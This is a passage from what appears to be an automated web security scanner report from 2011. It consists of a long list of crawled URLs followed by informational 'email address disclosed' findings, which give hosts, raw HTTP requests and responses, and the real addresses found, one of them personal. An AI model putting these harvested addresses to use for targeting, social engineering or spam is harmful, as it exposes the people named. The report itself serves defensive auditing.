http://dir.filewatcher.com/d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html
http://dir.filewatcher.com/d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html
http://dir.filewatcher.com/d/FreeBSD/7-current/ia64.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html
http://dir.filewatcher.com/d/FreeBSD/7.0-release/amd64.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html
http://dir.filewatcher.com/d/FreeBSD/7.0-release/i386.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html
http://dir.filewatcher.com/d/FreeBSD/7.0-release/sparc64.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html
http://dir.filewatcher.com/d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html
http://dir.filewatcher.com/d/FreeBSD/distfiles/Other.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html
http://dir.filewatcher.com/d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html
http://dir.filewatcher.com/d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html
http://dir.filewatcher.com/d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html
http://dir.filewatcher.com/d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html
http://dir.filewatcher.com/d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html
http://dir.filewatcher.com/d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html
http://dir.filewatcher.com/d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html
http://dir.filewatcher.com/d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html
http://dir.filewatcher.com/d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html
http://dir.filewatcher.com/d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html
http://dir.filewatcher.com/d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html
http://dir.filewatcher.com/d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html
http://dir.filewatcher.com/d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html
http://dir.filewatcher.com/d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html
http://dir.filewatcher.com/d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html
http://dir.filewatcher.com/d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html
http://dir.filewatcher.com/d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html
http://dir.filewatcher.com/d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html
http://dir.filewatcher.com/d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html
http://dir.filewatcher.com/d/Other/src/Applications/Communications/aub-2.0.5-10.src.rpm.82336.html
http://docs.joomla.org/
http://docs.joomla.org/Development_Working_Group
http://docs.joomla.org/Joomla!_Extension_Directory_FAQs
http://docs.joomla.org/Tutorial:Creating_a_basic_Joomla!_template
http://feeds.joomla.org/JoomlaSecurityNews
http://golded-plus.sourceforge.net/
http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22
http://groups.google.com/group/joomla-commits/topics
http://groups.google.com/group/joomla-dev-framework
http://groups.google.com/group/joomla-dev-general
http://groups.google.com/group/joomlabugsquad
http://groups.google.com/groups
http://home.arcor.de/kaffeetisch/slrnconf.html
http://husky.sourceforge.net/
http://investor.autobytel.com/
http://joomlacode.org/gf/
http://joomlacode.org/gf/project/bm01/
http://joomlacode.org/gf/project/joomla/scmsvn/
http://joomlacode.org/mktree.js
http://joomlacode.org/tabber.js
http://jqueryui.com/about
http://kickapps.yuku.com/service/searchEverythingAsRss.kickAction
http://klibido.sourceforge.net/
http://mako.cc/projects/aub/
http://mako.cc/projects/aub/ChangeLog
http://mako.cc/projects/aub/docs/Introducing_AUB
http://mako.cc/projects/aub/docs/aub.1.html
http://mako.cc/projects/aub/docs/aubconf.1.html
http://mako.cc/projects/aub/download/aub_2.2.tar.gz
http://mediacdn.disqus.com/1295633860/build/system/disqus.js
http://mediacdn.disqus.com/1295633860/js/dist/lib.js
http://mozex.mozdev.org/index.html
http://multisuck.sourceforge.net/
http://news.cnet.com/
http://newspost.unixcab.org/
http://newsstar.sourceforge.net/
http://noffle.sourceforge.net/
http://noisybox.net/computers/nzbperl/
http://offog.org/code/rawdog.html
http://people.joomla.org/
http://security.freebsd.org/
http://shop.parenthood.com/blog/goodreadds/2011/01/19/udderly-hysterical-amazing-cow-contest/
http://simonwillison.net/2004/May/26/addLoadEvent/
http://sites.inka.de/~bigred/sw/c-nocem.html
http://sourceforge.net/projects/nzbget/
https://spreadsheets0.google.com/embeddedform
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js
http://static.sourceforge.net/include/jquery/jquery.cookie.js
http://tantek.com/log/2004/09.html
http://thenextweb.com/
http://tweetmeme.com/about/advertising/display
http://tweetmeme.com/about/advertising/featured_tweets
http://tweetmeme.com/about/advertising/retweet_ads
http://tweetmeme.com/about/channels
http://tweetmeme.com/about/privacy
http://tweetmeme.com/scripts/search.xml
http://tweetmeme.com/user/alexia
http://twitter.com/7News/
http://twitter.com/7news
http://twitter.com/cw56
http://twitter.com/datasift
http://twitter.com/typekit
http://twitter.com/ups
http://ubh.sourceforge.net/
http://venedet.michnica.net/media/system/js/mootools-more.js
http://whdhstore.hipcricket.com/
http://widgets.twimg.com/j/2/widget.css
http://widgets.twimg.com/j/2/widget.js
http://www.aerotrader.com/sell/
http://www.americascupmedia.com/scripts/jquery.cookie.js
http://www.americascupmedia.com/scripts/overlib.js
http://www.aspirationtech.org/
http://www.atvtraderonline.com/research/resources/
http://www.atvtraderonline.com/sell/
http://www.aub.edu.lb/main/aub_files/Pages/contacts.aspx/x22
http://www.aub.edu.lb/tour/admissions/AUB-VR_196.html/x22
http://www.aub.edu.lb/tour/admissions/AUB-VR_196.html/x22/x3e/x3cli
http://www.aub.edu.lb/x22
http://www.aub.edu.lb/x22/x3e/x3cli
http://www.autobytel.com/content/home/help/index.cfm
http://www.autobytel.com/content/home/help/index.cfm
http://www.autobytel.com/content/home/help/index.cfm/action/about
http://www.autobytel.com/content/home/help/index.cfm/action/contact
http://www.autobytel.com/content/home/help/index.cfm/action/privacy
http://www.autobytel.com/content/home/help/index.cfm/action/terms
http://www.autocheck.com/consumers/javascripts/jquery.hoverIntent.js
http://www.autocheck.com/consumers/javascripts/main_javascript.js
http://www.autotraderclassics.com/find/index.xhtml/x22
http://www.autotraderclassics.com/x22
http://www.autotraderstatic.com/inc/js/myatc/notifications.js
http://www.barelyfitz.com/projects/tabber/
http://www.barkerstores.com/soundings/
http://www.blip.tv/about/
https://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js
https://www.bmwusa.com/JavaScript/s_code.js
http://www.boattrader.com/research/resources/
http://www.bymnews.com/scripts/prototype.js
http://www.cloudaccess.net/cloudaccess-partner-program.html
http://www.cloudaccess.net/contact-us.html
http://www.cloudaccess.net/contact-us/474.html
http://www.cloudaccess.net/investor-relations.html
http://www.cloudaccess.net/plugins/system/rokbox/rokbox.js
http://www.cloudaccess.net/trial.html
http://www.commercialtrucktrader.com/sell/
http://www.cycletrader.com/research/resources/
http://www.cycletrader.com/sell/
http://www.dedipower.com/
http://www.dinoex.de/unix-connect.html
http://www.directstartv.com/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.ebayinc.com/content/press_release/ebay_selects_joomla_open_source_to_foste
http://www.employmentguide.com/
http://www.equipmenttraderonline.com/research/resources/
http://www.equipmenttraderonline.com/sell/
http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html
http://www.exit109.com/~jeremy/news/cleanfeed.html
http://www.fiction.net/blong/programs/#aub/x26amp
http://www.foxaudiencenetwork.com/aboutus_contactus.php
http://www.freebsd.org/about.html
http://www.freebsd.org/cgi/cvsweb.cgi/ports/chinese/pine4
http://www.freebsd.org/cgi/cvsweb.cgi/ports/chinese/tin
http://www.freebsd.org/cgi/cvsweb.cgi/ports/converters/mpack
http://www.freebsd.org/cgi/cvsweb.cgi/ports/deskutils/kdepim3
http://www.freebsd.org/cgi/cvsweb.cgi/ports/german/unix-connect
http://www.freebsd.org/cgi/cvsweb.cgi/ports/japanese/slrn
http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/adcomplain
http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/alpine
http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/claws-mail
http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/lmtp2nntp
http://www.freebsd.org/cgi/cvsweb.cgi/ports/net/pear-Net_NNTP
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/atp
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/aub
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/bgrab
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/brag
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/c-nocem
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/cg
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/cleanfeed
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/crashmail
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/dnews
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/fidogate
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/fidogate-ds
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/golded+
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/gup
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/hellanzb
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-base
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-base-devel
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-bsopack
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-fidoconf
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-fidoconf-devel
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hpt
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hpt-devel
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hptkill
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hptsqfix
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hpucode
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-htick
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-htick-devel
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-smapi-devel
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/inn
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/knews
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/leafnode
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/lottanzb
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/lusernet
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/mmail
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/multisuck
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newscache
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsfetch
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsfish
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsgrab
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newspost
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsstar
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsx
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nget
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nn
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nnap
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntp
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntpbtr
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntpcache
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntpswitch
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/noffle
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nzbget
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nzbperl
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/openftd
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-Gateway
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-NNML
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-NNTPClient
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-News-Article
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-News-Article-NoCeM
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-News-Newsrc
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-NewsLib
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-POE-Component-Client-NNTP
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-POE-Component-Server-NNTP
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/pan
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/papercut
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/pgpmoose
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/plor
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/py-pynzb
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/py-twistedNews
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/py-yenc
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/pyne
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/rawdog
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/rkive
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/s-news
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/sabnzbdplus
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slnr
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slrn
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slrnconf
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slrnface
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slurp
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/sn
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/suck
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/suck-cnews
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/tin
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/trn
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/trn4
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/ubh
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/unpost
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/xmitbin
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/xpn
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/xrn
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/yencode
http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/yydecode
http://www.freebsd.org/cgi/cvsweb.cgi/ports/www/mozex
http://www.freebsd.org/cgi/cvsweb.cgi/ports/www/p5-Apache-NNTPGateway
http://www.freebsd.org/cgi/cvsweb.cgi/ports/www/pnews
http://www.freebsd.org/cgi/pds.cgi
http://www.freebsd.org/cgi/ports.cgi
http://www.freebsd.org/cgi/search.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/community/mailinglists.html
http://www.freebsd.org/events/events.html
http://www.freebsd.org/mailto.html
http://www.freebsd.org/ports/archivers.html
http://www.freebsd.org/ports/converters.html
http://www.freebsd.org/ports/editors.html
http://www.freebsd.org/ports/ftp.html
http://www.freebsd.org/ports/lang.html
http://www.freebsd.org/ports/mail.html
http://www.freebsd.org/ports/news.html
http://www.freebsd.org/ports/news.html/x22
http://www.freebsd.org/ports/shells.html
http://www.freebsd.org/ports/tcl.html
http://www.freebsd.org/ports/x11-fonts.html
http://www.freebsd.org/ports/x11-toolkits.html
http://www.freebsd.org/ports/x11.html
http://www.freebsd.org/releng/
http://www.freebsd.org/send-pr.html
http://www.freebsd.org/usergroups.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.gnu.org/copyleft/gpl.html
http://www.gnu.org/licenses/gpl.html
http://www.gnu.org/licenses/licenses.html
http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
http://www.google.com/search
http://www.google.com/search
https://www.google.com/accounts/Login
https://www.google.com/accounts/ServiceLogin
http://www.goozernation.com/video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq
http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x22
http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp
http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared
http://www.huddletogether.com/projects/lightbox2/
https://www.isc.org/software/inn
http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html
http://www.kbsp.com/
http://www.kelvinluck.com/
http://www.lau.edu.lb/x22
http://www.leafnode.org/
http://www.lithuanianjoomla.com/index.php
http://www.lithuanianjoomla.com/media/system/js/mootools-more.js
http://www.mit.edu/people/jik/software/xrn.html
https://www.mytraderonline.com/javascript/master_s_code.js
http://www.netlingo.com/acronyms.php
http://www.netlingo.com/add-edit/editor-guidelines.php
http://www.netlingo.com/contact/contact-us.php
http://www.netlingo.com/contact/linktonetlingo.php
http://www.netlingo.com/scripts/jquery.bookmark.js
http://www.netlingo.com/scripts/jquery.dimensions.js
http://www.netlingo.com/scripts/jquery.mousewheel.js
http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue
http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html
http://www.noreastermagazine.com/
http://www.opensource.org/licenses/bsd-license.php
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.openusenet.org/diablo/
http://www.ossp.org/pkg/tool/lmtp2nntp/
https://www.paperg.com/post.php
http://www.playshakespeare.com/
http://www.positioniseverything.net/easyclearing.html
http://www.pwc-traderonline.com/research/resources/
http://www.pwc-traderonline.com/sell/
http://www.rdrop.com/users/billmc/adcomplain.html
http://www.rochenhost.com/
http://www.rochenhost.com/joomla-hosting
http://www.rvtraderonline.com/research/resources/
http://www.saddi.com/software/newsfish/
http://www.safepeak.com/downloadtrial/
http://www.sailinganarchy.com/advertise.htm
http://www.sailinganarchy.com/breymaiersailing.com
http://www.sailinganarchy.com/calendar/index.php
http://www.sailinganarchy.com/editor/audio_video.php
http://www.sailinganarchy.com/editor/pimpin.php
http://www.sailinganarchy.com/index_page1.php
http://www.sailinganarchy.com/index_page2.php
http://www.sailinganarchy.com/java/ad_rotation.js
http://www.sailinganarchy.com/none
http://www.sailinganarchy.com/terms.htm
http://www.snowmobiletraderonline.com/sell/
http://www.soundingsonline.com/
http://www.soundingsonline.com/about-us
http://www.soundingsonline.com/advertise
http://www.soundingsonline.com/archives
http://www.soundingsonline.com/boat-shop
http://www.soundingsonline.com/boat-shop/know-how
http://www.soundingsonline.com/boat-shop/new-boats
http://www.soundingsonline.com/boat-shop/new-gear
http://www.soundingsonline.com/boat-shop/on-powerboats
http://www.soundingsonline.com/boat-shop/on-sailboats
http://www.soundingsonline.com/boat-shop/q-a-a
http://www.soundingsonline.com/boat-shop/sea-savvy
http://www.soundingsonline.com/boat-shop/tech-talk
http://www.soundingsonline.com/boat-shop/used-boat-review
http://www.soundingsonline.com/calendar
http://www.soundingsonline.com/career-opportunities
http://www.soundingsonline.com/columns-blogs
http://www.soundingsonline.com/columns-blogs/bay-tripper
http://www.soundingsonline.com/columns-blogs/books
http://www.soundingsonline.com/columns-blogs/new-england-fishing
http://www.soundingsonline.com/columns-blogs/under-way
http://www.soundingsonline.com/component/chronocontact/
http://www.soundingsonline.com/component/content/article/237622
http://www.soundingsonline.com/contact-us
http://www.soundingsonline.com/features
http://www.soundingsonline.com/features/destinations
http://www.soundingsonline.com/features/in-depth
http://www.soundingsonline.com/features/justyesterday
http://www.soundingsonline.com/features/lifestyle
http://www.soundingsonline.com/features/profiles
http://www.soundingsonline.com/features/technical
http://www.soundingsonline.com/features/type-of-boat
http://www.soundingsonline.com/index.php
http://www.soundingsonline.com/more/digital-publications
http://www.soundingsonline.com/more/the-masters-series
http://www.soundingsonline.com/news
http://www.soundingsonline.com/news/coastwise
http://www.soundingsonline.com/news/dispatches
http://www.soundingsonline.com/news/home-waters
http://www.soundingsonline.com/news/mishaps-a-rescues
http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan
http://www.soundingsonline.com/news/sailing
http://www.soundingsonline.com/news/todays-top-stories
http://www.soundingsonline.com/resources
http://www.soundingsonline.com/s_code.js
http://www.soundingsonline.com/site-map
http://www.soundingsonline.com/subscription-services
http://www.soundingsonline.com/subscription-services/preview-current-issue
http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
http://www.speech.cs.cmu.edu/~sburke/pub/luhn_lib.html
http://www.thefeast.com/boston/
http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html
http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html
http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html
http://www.thepointebrodiecreek.com/
http://www.traderonline.com/advertise/
http://www.traderonline.com/javascript/master_s_code.js
http://www.traderonline.com/security/
http://www.w-w-i.com/
http://www.w-w-i.com/velux_5_oceans_2010_race
http://www.w-w-i.com/velux_5_oceans_2010_race/
http://www.w3.org/
http://www.w3.org/TR/css3-selectors/
http://www.w3.org/TR/html4/strict.dtd
http://www.x64bitdownload.com/js/rating.js
http://www.x64bitdownload.com/templates/X64/css/rating.css
http://www1.whdh.com/contact/
http://www1.whdh.com/contact/closed-caption-concerns
http://www1.whdh.com/events/
http://www1.whdh.com/features/articles/dish/BO144734/
http://www1.whdh.com/features/articles/dish/BO144759/
http://www1.whdh.com/features/articles/dish/BO144797/
http://www1.whdh.com/features/articles/dish/BO144833/
http://www1.whdh.com/features/articles/hank/BO144372/
http://www1.whdh.com/features/articles/hank/BO144452/
http://www1.whdh.com/features/articles/hank/BO144489/
http://www1.whdh.com/features/articles/hank/BO144588/
http://www1.whdh.com/features/articles/hiller/BO144771/
http://www1.whdh.com/features/articles/hiller/BO144776/
http://www1.whdh.com/features/articles/hiller/BO144796/
http://www1.whdh.com/features/articles/hiller/BO144813/
http://www1.whdh.com/features/articles/hiller/BO144841/
http://www1.whdh.com/features/articles/holiday_helping/BO144709/
http://www1.whdh.com/features/articles/holiday_helping/BO144719/
http://www1.whdh.com/features/articles/holiday_helping/BO144727/
http://www1.whdh.com/features/articles/holiday_helping/BO144733/
http://www1.whdh.com/includes/elements/accordion_whdh-senditto7
http://www1.whdh.com/includes/elements/accordion_whdh-storyideas
http://www1.whdh.com/includes/elements/accordion_whdh-viewervoices
http://www1.whdh.com/jobs/
http://www1.whdh.com/jobs/internships
http://www1.whdh.com/js/jq/jquery.hoverIntent-r5.min.js
http://www1.whdh.com/news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/
http://www1.whdh.com/privacypolicy
http://www1.whdh.com/sales/
http://www1.whdh.com/slideshows/view/BitterBlastTemperatures
http://www1.whdh.com/slideshows/view/FunintheSnow
http://www1.whdh.com/slideshows/view/January12thStormPets
http://www1.whdh.com/slideshows/view/January12thTreesDown
http://www1.whdh.com/slideshows/view/January18WinterStorm
http://www1.whdh.com/slideshows/view/January21SnowStorm
http://www3.whdh.com/mobile/phoneforecast/settings.php
http://xpn.altervista.org/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

24.1. https://acc.newsguy.com/user/-/accnt_contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_contact

Issue detail

The following email address was disclosed in the response:

h02332@gmail.com

Request

Response

24.2. http://ads.adbrite.com/adserver/behavioral-data/8201 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/behavioral-data/8201

Issue detail

The following email address was disclosed in the response:

4d3de9ff@loadus.exelator.com

Request

Response

24.3. http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.doclix.com
Path:	/adserver/serve/js/doclix_synd_overlay.js

Issue detail

The following email address was disclosed in the response:

feedback@adside.com

Request

GET /adserver/serve/js/doclix_synd_overlay.js HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:41 GMT
Last-Modified: Fri, 21 Jan 2011 19:04:02 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Connection: close
Content-Length: 23745

/*[AdSide/DOCLIX anchor ad unit: first tier]*/

if (typeof doclix_lib == 'undefined') {
(function () {/*[load common script library v1.0]*/
var d = document, gT = 'getElementsByTagName', cE = '
...[SNIP]...
<a href="mailto:feedback@adside.com">feedback@adside.com</a>
...[SNIP]...

24.4. http://aws.amazon.com/ec2/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://aws.amazon.com
Path:	/ec2/x22

Issue detail

The following email address was disclosed in the response:

aws@amazon.com

Request

GET /ec2/x22 HTTP/1.1
Host: aws.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:01:50 GMT
Server: Server
Vary: Host,Accept-Language,Accept-Encoding,User-Agent
Accept-Ranges: bytes
nnCoection: close
Content-Type: text/html
Content-Length: 6282

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="icon" ty
...[SNIP]...
<a href="mailto:aws@amazon.com">
...[SNIP]...

24.5. http://aws.amazon.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://aws.amazon.com
Path:	/x22

Issue detail

The following email address was disclosed in the response:

aws@amazon.com

Request

GET /x22 HTTP/1.1
Host: aws.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:01:49 GMT
Server: Server
Vary: Host,Accept-Language,Accept-Encoding,User-Agent
Accept-Ranges: bytes
nnCoection: close
Content-Type: text/html
Content-Length: 6282

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="icon" ty
...[SNIP]...
<a href="mailto:aws@amazon.com">
...[SNIP]...

24.6. http://backend.parenthood.com/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://backend.parenthood.com
Path:	/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Us.tc

Request

Response

HTTP/1.1 200 OK
